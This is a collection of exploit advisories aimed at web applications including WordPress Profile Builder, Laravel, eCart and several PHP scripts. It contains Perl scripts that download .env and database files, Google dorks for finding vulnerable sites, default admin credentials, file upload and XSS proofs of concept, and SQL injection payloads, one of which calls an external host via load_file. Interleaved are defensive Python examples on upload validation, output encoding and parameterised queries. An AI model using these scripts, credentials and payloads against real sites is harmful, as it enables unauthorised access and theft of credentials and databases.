<pre><code>====================================================================================================================================<br />| # Title : WordPress profile builder 3.0.5 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit) | <br />| # Vendor : https://fr.wordpress.org/plugins/profile-builder/ | <br />| # Dork : " " |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/member_detail.php?id=1772 <====| inject here (the id parameter)<br /><br />[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/login.php <====| Login<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : GLOBAL EDUCATION & TECHNOWORLD Version 4.1 unauthorized backup download Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.10(Pro) / browser : Mozilla firefox 108.0.2(32-bit) | <br />| # Vendor : https://globaledune.com/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The vulnerability allows anyone to download a copy of the site's database; the copy contains all tables, including the admin records.<br /><br />[+] Use payload : /ims_panel/backup.php or /new/backup.php or /soft/backup.php<br /><br />[+] https://127.0.0.1/isoftcomputerin/ims_panel/backup.php<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Laravel from Version 1.0 to 9.47.0 MySQL Credential Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://laravel.com/ | <br />| # Dork : db_password filetype:env |<br /> "Whoops! There was an error." |<br />====================================================================================================================================<br /><br />note : <br /><br />[+] 1 : <br /> <br />Laravel's default .env file contains some common configuration values that may differ based on whether your application <br />is running locally or on a production web server. These values are then retrieved from various Laravel configuration files <br />within the config directory using Laravel's env function.<br /><br />[+] 2 : If no custom error page is configured, the framework's default error page displays sensitive information such as hosting passwords and database credentials.<br /><br />[+] Poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : /.env (depending on the server's protection, the file is either displayed directly, offered as a download, or not served at all)<br /><br />[+] https://127.0.0.1/lala/.env <br /><br />====================================================================================================================================<br />| # Title : Laravel from Version 1.0 to 9.47.0 sensitive information disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://laravel.com/ | <br />| # Dork : "Whoops! There was an error." |<br />====================================================================================================================================<br /><br />poc : <br /><br /><br />[+] If no custom error page is configured, the framework's default error page displays sensitive information such as hosting passwords and database credentials.<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] https://127.0.0.1/lalaland/categorie/avant_apres/<br /><br />[+] https://youtu.be/tz_w563Nyac <br /><br />====================================================================================================================================<br />| # Title : Laravel from Version 1.0 to 9.47.0 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://laravel.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the configuration file:<br /><br /> The following Perl script will attempt to download the .env file.<br /> The .env file contains common configuration values and the connection details for the application's database.<br /> The code lets you choose where the downloaded file is saved.<br /> <br />[+] Dorking in Google or other search engines.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br /># Author : indoushka<br /><br />use LWP::UserAgent;<br /><br />system('cls');<br />print "\n[+] Laravel from Version 1.0 to 9.47.0 Database Disclosure [+] \n\n";<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[+] Author : indoushka \n\n";<br />print "[-] How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br /># the script appends .env itself, so pass only the directory part of the path<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path) = @ARGV;<br /><br />$File=".env";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br /># :content_file writes the response body straight to the given local file<br />my $request = $useragent->get($url,":content_file" => "D:/.env");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/.env\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : 2ad guestbook version 2.0 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : http://www.2ad.free.fr | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl script will attempt to download the file (livre-or.mdbsmdb.mdb).<br /> That file is the guestbook's database and contains all of its data.<br /> <br />[+] Dorking in Google or other search engines.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># 2ad guestbook version 2.0 Database Disclosure Exploit <br />#<br /># Author : indoushka<br />#<br /># Vendor : http://www.2ad.free.fr<br /> <br /> <br /> <br />use LWP::UserAgent;<br /><br />system('cls');<br />print "\n[+] 2ad guestbook version 2.0 Database Disclosure Exploit [+] \n\n";<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-] How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path) = @ARGV;<br /><br /># relative location of the Access database inside the guestbook install<br />$File="db/livre-or.mdbsmdb.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br /># :content_file writes the response body straight to the given local file<br />my $request = $useragent->get($url,":content_file" => "D:/livre-or.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/livre-or.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Gold Filled CRM v 2.0 Remote File Upload vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The following HTML form uploads files to the remote host.<br /><br />[+] Vulnerable file : /feltolt2.php<br /><br />[+] Uploaded files are stored under /product_images/original/ (example: /product_images/original/index.svg).<br /><br />[+] Save the code as poc.html.<br /><br />&lt;!DOCTYPE html&gt;<br />&lt;html&gt;<br />&lt;body&gt;<br />&lt;div class="center-block kozep"&gt;<br />&lt;center&gt;<br />&lt;h2&gt;Képek felvitele&lt;/h2&gt;<br />Termék azonosítója :<br />&lt;form action="http://127.0.0.1/goldfilledhu/admin/feltolt2.php" method="post" enctype="multipart/form-data"&gt;<br />&lt;input type="file" name="files[]" multiple="multiple" accept="image/*"&gt;<br />&lt;input name="send" type="submit" value="Feltölt"&gt;<br />&lt;input name="send" type="submit" value="Vissza"&gt;<br />&lt;/form&gt;<br />&lt;/center&gt;<br />&lt;/div&gt;<br />&lt;/body&gt;<br />&lt;/html&gt;<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
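The form above works because the server trusts whatever arrives in files[]; the accept="image/*" attribute is enforced only by the browser. As an added example (editor's code, not the vendor's and not from the advisory), the Python function below shows the server-side checks a hardened upload endpoint applies: an authenticated session, a size limit, content sniffing by magic bytes instead of trusting the extension or Content-Type, rejection of non-raster formats such as the SVG mentioned above, and a server-generated filename so the client-supplied name never touches the filesystem. The session dict, the magic-byte table and the sample inputs are assumptions constructed for the demo.

```python
import secrets

# Magic bytes of the raster formats a product-image endpoint should accept
# (assumed allowlist for the demo).
RASTER_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

MAX_UPLOAD_BYTES = 2 * 1024 * 1024


class UploadRejected(Exception):
    """Raised with a reason when an upload fails a server-side check."""


def sniff_raster_type(data: bytes):
    """Return 'png', 'jpg' or 'gif' from the file's leading bytes, else None."""
    for magic, ext in RASTER_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(session: dict, client_filename: str, data: bytes) -> str:
    """Apply the checks a hardened upload handler needs; return the storage name.

    The client-supplied filename appears only in the rejection message; it is
    never used for storage, so '../' sequences or a scripted extension cannot
    influence where or how the bytes are written.
    """
    if not session.get("authenticated"):
        raise UploadRejected("login required")
    if len(data) == 0 or len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("empty or oversized upload")
    ext = sniff_raster_type(data)
    if ext is None:
        # SVG, HTML and other text-based content all land here: they carry no
        # raster magic, whatever extension or MIME type the client claimed.
        raise UploadRejected(f"rejected {client_filename!r}: not a PNG/JPEG/GIF")
    # Random server-chosen name; the extension comes from the sniffed type.
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample inputs for the demo.
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
SVG_STUB = b'<svg xmlns="http://www.w3.org/2000/svg"></svg>'


def demo():
    admin = {"authenticated": True}
    anon = {}
    results = {"png_ok": validate_upload(admin, "index.png", PNG_STUB).endswith(".png")}
    for label, sess, name, data in [
        ("svg", admin, "index.svg", SVG_STUB),
        ("traversal_name", admin, "../index.png", SVG_STUB),
        ("unauthenticated", anon, "index.png", PNG_STUB),
    ]:
        try:
            validate_upload(sess, name, data)
            results[label] = "accepted"
        except UploadRejected as exc:
            results[label] = str(exc)
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:16} {outcome}")
```

Storing the generated name outside the web root, or serving the directory with script execution disabled, closes the remaining gap: even an accepted image is then never interpreted by the server.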
<pre><code>┌──────────────────────────────────────────────────────────────────────┐<br />│ C r a C k E r                                                        │<br />│ T H E   C R A C K   O F   E T E R N A L   M I G H T                  │<br />└──────────────────────────────────────────────────────────────────────┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌──────────────────────────────────────────────────────────────────────┐<br />│ [ Exploits ]                                                         │<br />├──────────────────────────────────────────────────────────────────────┤<br />│ Author    : CraCkEr                                                  │<br />│ Website   : ecartmultivendorweb.thewrteam.in                         │<br />│ Vendor    : By WRTEAM Ekart.Com                                      │<br />│ Software  : eCart Web 5.0.0 - Multi Vendor eCommerce Marketplace     │<br />│ Vuln Type : Reflected XSS                                            │<br />│ Method    : GET                                                      │<br />│ Impact    : Manipulate the content of the site                       │<br />├──────────────────────────────────────────────────────────────────────┤<br />│ Release Notes:                                                       │<br />│ ═════════════                                                        │<br />│ An attacker who sends the victim a link containing a malicious URL,  │<br />│ by email or instant message, can perform a wide variety of actions,  │<br />│ such as stealing the victim's session token or login credentials.    │<br />└──────────────────────────────────────────────────────────────────────┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌──────────────────────────────────────────────────────────────────────┐<br />│ © CraCkEr 2023                                                       │<br />└──────────────────────────────────────────────────────────────────────┘<br /><br /><br />URL parameter 'category' is vulnerable to XSS<br /><br />Path: /shop<br /><br />https://ecartmultivendorweb.thewrteam.in/shop?category=baby-need-s-1su7mh%3cscript%3ealert(1)%3c%2fscript%3eg9eop&sub-category=test-1<br /><br /><br />[-] Done<br /></code></pre>
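The category parameter is reflected into the /shop page without output encoding. As an added example (editor's code, not the vendor's and not from the advisory), the Python below decodes the advisory's URL the way the server would, renders the value as the vulnerable page does and as a hardened page should, and adds the slug allowlist check a category parameter naturally admits. The URL is the one from the advisory; the rendering functions and the slug pattern are assumptions for the demo.

```python
import html
import re
from urllib.parse import urlparse, parse_qs

# The advisory's PoC URL, percent-encoded as published.
POC_URL = ("https://ecartmultivendorweb.thewrteam.in/shop"
           "?category=baby-need-s-1su7mh%3cscript%3ealert(1)%3c%2fscript%3eg9eop"
           "&sub-category=test-1")

# Assumed shape of a category slug: lowercase alphanumerics joined by single hyphens.
SLUG_RE = re.compile(r"^[a-z0-9]+(?:-[a-z0-9]+)*$")


def category_from(url: str) -> str:
    """Extract the percent-decoded 'category' query parameter, as a server would."""
    params = parse_qs(urlparse(url).query)
    return params.get("category", [""])[0]


def render_vulnerable(category: str) -> str:
    # The flaw: the decoded parameter is concatenated into HTML as-is, so
    # any tags it carries become part of the page.
    return f"<h1>Category: {category}</h1>"


def render_hardened(category: str) -> str:
    # Defence 1: output encoding for the HTML text context. Markup in the
    # value is displayed as text instead of being parsed by the browser.
    return f"<h1>Category: {html.escape(category, quote=True)}</h1>"


def is_valid_slug(category: str) -> bool:
    # Defence 2: input validation. A category is a slug, so anything else can
    # be rejected with a 400 before it reaches any template at all.
    return SLUG_RE.fullmatch(category) is not None


def contains_script_tag(markup: str) -> bool:
    """Crude check used by the demo: does a raw <script tag survive rendering?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    value = category_from(POC_URL)
    print("valid slug:", is_valid_slug(value))
    print("vulnerable:", render_vulnerable(value))
    print("hardened:  ", render_hardened(value))
```

Output encoding is the fix that holds for every value; the slug check is defence in depth that also shortens the error path for obviously malformed requests.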
<pre><code>====================================================================================================================================<br />| # Title : Foloosi Shopping v5.5.7 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit) | <br />| # Vendor : https://www.foloosishopping.com/ | <br />| # Dork : "category/beauty-health-hair" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability consists of leaving the default settings in place during installation of the script<br /> and keeping the default username and password.<br /> <br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : user=admin@example.com & pass=123456 <br /><br />[+] https://127.0.0.1/login<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Flex Version: 5.22 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://csimmobiliere.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability consists of leaving the default settings in place during installation of the script<br /> and keeping the default username and password.<br /> <br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : user=botble & pass=159357 <br /><br />[+] https://127.0.0.1/Flex/admin/login<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>## Title: ChiKoi-1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 01.12.2023<br />## Vendor: https://chikoiquan.tanhongit.com/<br />## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi<br /><br />## Description:<br />The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'<br />was submitted in the User-Agent HTTP header.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />An attacker can extract all information held by this system and seriously harm its users,<br />for example by extracting the bank account details they use to pay each other.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: User-Agent (User-Agent)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)<br />Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND<br />9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION<br />SELECT 6994) END))-- -<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)<br />Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND<br />(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT<br />(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR<br />---<br />```<br />[+] Online:<br /><br />```MySQL<br />---<br />Parameter: User-Agent (User-Agent)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)<br />Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND<br />8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION<br />SELECT 6426) END))-- -<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/7x69yz)<br /><br />## Time spent<br />`01:30:00`<br /><br />## Writing an exploit<br />`00:05:00`<br /><br /></code></pre>
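The finding above says the User-Agent header reaches a MySQL statement unescaped, which is typical of visitor-logging code that builds an INSERT by string concatenation. As an added example (editor's code, not from the ChiKoi project or the advisory), the Python below reproduces that pattern against an in-memory SQLite table and places the parameterised version beside it: the same header value that breaks the concatenated statement is stored verbatim when bound as a parameter. The table is constructed for the demo, and the header value is a shortened form of the advisory's boolean-based payload.

```python
import sqlite3

# Constructed header value in the style of the advisory's payload: the quote
# closes the string literal the query expected to hold the whole header.
PROBE_UA = "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)' WHERE 8386=8386-- -"


def open_db() -> sqlite3.Connection:
    """Create the visitor-log table the demo writes into (in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, user_agent TEXT)")
    return conn


def log_visit_vulnerable(conn: sqlite3.Connection, user_agent: str) -> None:
    # The header is spliced into the statement text, so the database parses
    # whatever it contains as SQL.
    conn.execute("INSERT INTO visits (user_agent) VALUES ('%s')" % user_agent)
    conn.commit()


def log_visit_safe(conn: sqlite3.Connection, user_agent: str) -> None:
    # Placeholder binding: the value travels separately from the statement
    # and can never change its structure, whatever characters it contains.
    conn.execute("INSERT INTO visits (user_agent) VALUES (?)", (user_agent,))
    conn.commit()


def stored_agents(conn: sqlite3.Connection):
    return [row[0] for row in conn.execute("SELECT user_agent FROM visits ORDER BY id")]


def demo():
    """Run both variants with the same header; return (vulnerable outcome, stored rows)."""
    conn = open_db()
    try:
        log_visit_vulnerable(conn, PROBE_UA)
        vulnerable_outcome = "executed"
    except sqlite3.OperationalError as exc:
        # The header altered the statement's grammar: direct evidence that the
        # value is being interpreted as SQL rather than as data.
        vulnerable_outcome = f"syntax error: {exc}"
    log_visit_safe(conn, PROBE_UA)
    return vulnerable_outcome, stored_agents(conn)


if __name__ == "__main__":
    outcome, rows = demo()
    print(outcome)
    print(rows)
```

The same rule applies to any header or cookie the application persists: treat it as data and bind it, never as a fragment of the statement.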
<pre><code>====================================================================================================================================<br />| # Title : DEPRIXA Pro V7.5 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://deprixacargo.link/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability consists of leaving the default settings in place during installation of the script<br /> and keeping the default username and password.<br /> <br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : user=admin & pass=09731 <br /><br />[+] https://127.0.0.1/deprixaprosite/demo/login.php<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>